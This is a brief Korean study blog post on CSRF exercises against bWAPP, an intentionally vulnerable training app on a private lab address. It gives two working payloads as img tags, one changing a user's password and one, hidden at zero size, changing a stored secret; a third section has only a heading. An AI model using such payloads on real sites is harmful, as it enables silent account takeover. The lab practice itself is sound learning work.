IT 공부용

11. A8_CSRF(Cross site request forgery) 본문

▶ 모의 해킹

11. A8_CSRF(Cross site request forgery)

호롤롤로루 2022. 10. 5. 14:07

● CSRF (Change Password)

비밀번호 바꾸는 form이네 이거말고 바로 다른곳에서 바꿀 수 있게 ㄱㄱ;

 

 

<img src="http://192.168.50.36/bWAPP/csrf_1.php?password_new=apple&password_conf=apple&action=change">

이거 입력하면

 

여기서 

id : bee

pwd : apple로 바꿔짐;

 

● CSRF (Change Secret)

<img src="http://192.168.50.36/bWAPP/csrf_3.php?secret=benmin%27qwer&login=bee&action=change" height=0 width=0> ㄱㄱ

 

 

 

 

 

 

● CSRF (Transfer Amount)